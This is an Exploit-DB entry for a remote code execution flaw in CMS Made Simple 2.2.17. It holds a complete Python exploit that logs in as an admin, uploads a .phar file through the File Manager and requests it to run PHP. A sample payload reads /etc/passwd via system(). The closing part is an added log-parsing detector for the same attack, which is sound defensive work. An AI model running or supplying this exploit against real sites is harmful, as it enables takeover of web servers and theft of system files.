CmsMadeSimple v2.2.17 – Remote Code Execution (RCE)

  • Author: Mirabbas Ağalarov
    Date: 2023-07-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51600/
  • #Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
    #Application: CmsMadeSimple
    #Version: v2.2.17
    #Bugs: Remote Code Execution (RCE)
    #Technology: PHP
    #Vendor URL: https://www.cmsmadesimple.org/
    #Software Link: https://www.cmsmadesimple.org/downloads/cmsms
    #Date found: 12-07-2023
    #Author: Mirabbas Ağalarov
    #Tested on: Linux


    import sys
    import requests

    # Target: a CMS Made Simple 2.2.17 install served from the web root of localhost.
    login_url = 'http://localhost/admin/login.php'
    upload_url = 'http://localhost/admin/moduleinterface.php'

    # Valid admin credentials are required: the File Manager upload action is authenticated.
    username = input('username = ')
    password = input('password = ')

    # Name of the payload file, which must sit in the same directory as this script.
    # Its content is plain PHP, e.g.:  <?php echo system('cat /etc/passwd') ?>
    # The File Manager module accepts the .phar extension, and on stacks where the
    # PHP handler also matches .phar (Debian/Ubuntu's Apache PHP module config does)
    # the uploaded file is executed as PHP when it is requested from /uploads/.
    file_path = input("phar file name (same directory as this script, content: "
                      "<?php echo system('cat /etc/passwd') ?>): ")

    login_data = {
        'username': username,
        'password': password,
        'loginsubmit': 'Submit'
    }

    session = requests.Session()
    response = session.post(login_url, data=login_data)

    # A 200 here does not prove the credentials were accepted (a rejected login
    # re-renders the form), so also require the __c cookie, which the admin session
    # sets and which the upload request below needs.
    if response.status_code == 200 and '__c' in session.cookies:
        print('Login account')
    else:
        print('Login problem.')
        sys.exit(1)

    # Multipart upload through the File Manager module's upload action.
    with open(file_path, 'rb') as payload:
        files = {
            'm1_files[]': payload
        }
        data = {
            'mact': 'FileManager,m1_,upload,0',
            '__c': session.cookies['__c'],
            'disable_buffer': '1'
        }
        response = session.post(upload_url, files=files, data=data)

    if response.status_code == 200:
        print('file upload')
        # File Manager stores uploads under /uploads/; requesting the .phar runs its PHP.
        rce_url = f"http://localhost/uploads/{file_path}"
        rce = requests.get(rce_url)
        print(rce.text)
    else:
        print('file not upload')
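The exploit above leaves two traces in the web server's access log: a POST to /admin/moduleinterface.php (the mact upload action travels in the POST body, so it is not visible in the log line itself) and, shortly after, a GET for a script-extension file under /uploads/ that the server answers with 200. The following is an added detection example, not part of the original exploit or of CMS Made Simple: it parses Apache combined-format access-log lines (the sample lines are constructed for the example), flags any .php/.phar/.phtml file served successfully from /uploads/, and marks whether the same client posted to the module interface within the preceding ten minutes. The endpoint paths, the ten-minute window and the extension list are assumptions chosen to match this exploit.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = '%d/%b/%Y:%H:%M:%S %z'

# Extensions a PHP handler may execute; .phar is the one this exploit relies on (assumed list).
SCRIPT_EXT = re.compile(r'\.(php\d?|phar|phtml|phps)$', re.IGNORECASE)

UPLOAD_ENDPOINT = '/admin/moduleinterface.php'   # File Manager upload goes through here
UPLOAD_DIR = '/uploads/'                         # default upload location targeted by the exploit
WINDOW = timedelta(minutes=10)                   # assumed correlation window


def parse(line):
    """Parse one combined-format line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev['ts'] = datetime.strptime(ev['ts'], TS_FMT)
    ev['path'] = ev['path'].split('?', 1)[0]     # drop any query string before checking the extension
    ev['status'] = int(ev['status'])
    return ev


def find_upload_rce(lines):
    """Return one alert per script file served with 200 from /uploads/.

    Each alert records whether the same client IP POSTed to the module interface
    within WINDOW beforehand, which is the pattern the exploit script produces.
    """
    last_upload_post = {}   # ip -> timestamp of the most recent POST to UPLOAD_ENDPOINT
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        if ev['method'] == 'POST' and ev['path'] == UPLOAD_ENDPOINT:
            last_upload_post[ev['ip']] = ev['ts']
        elif (ev['method'] == 'GET' and ev['path'].startswith(UPLOAD_DIR)
              and SCRIPT_EXT.search(ev['path']) and ev['status'] == 200):
            prior = last_upload_post.get(ev['ip'])
            correlated = prior is not None and ev['ts'] - prior <= WINDOW
            alerts.append({'ip': ev['ip'], 'path': ev['path'], 'ts': ev['ts'],
                           'ua': ev['ua'], 'correlated_upload': correlated})
    return alerts


# Constructed sample log: the exploit's login/upload/trigger sequence from 10.0.0.5,
# benign static traffic, a stray script served with no prior upload, and a 404 that is ignored.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jul/2023:10:00:01 +0000] "POST /admin/login.php HTTP/1.1" 200 2410 "-" "python-requests/2.31.0"
10.0.0.5 - - [19/Jul/2023:10:00:02 +0000] "POST /admin/moduleinterface.php HTTP/1.1" 200 1835 "-" "python-requests/2.31.0"
10.0.0.5 - - [19/Jul/2023:10:00:03 +0000] "GET /uploads/shell.phar HTTP/1.1" 200 1706 "-" "python-requests/2.31.0"
10.0.0.9 - - [19/Jul/2023:10:05:00 +0000] "GET /uploads/images/logo.png HTTP/1.1" 200 8832 "https://example.test/" "Mozilla/5.0"
10.0.0.7 - - [19/Jul/2023:11:30:00 +0000] "GET /uploads/old.php HTTP/1.1" 200 40 "-" "curl/8.1.2"
10.0.0.7 - - [19/Jul/2023:11:31:00 +0000] "GET /uploads/notes.PHTML HTTP/1.1" 404 196 "-" "curl/8.1.2"
"""

if __name__ == '__main__':
    for alert in find_upload_rce(SAMPLE_LOG.splitlines()):
        tag = 'UPLOAD+EXEC' if alert['correlated_upload'] else 'EXEC-ONLY'
        print(f"{alert['ts'].isoformat()} {alert['ip']} {tag} {alert['path']} ua={alert['ua']!r}")
```

The GET with a 200 is the strong signal on its own: no legitimate request should be served PHP from the upload directory, so an "EXEC-ONLY" hit still deserves a look. The correlation only adds confidence, since a POST to moduleinterface.php also covers ordinary admin activity, and the mact parameter that would distinguish the upload action is in the request body, which the access log does not record.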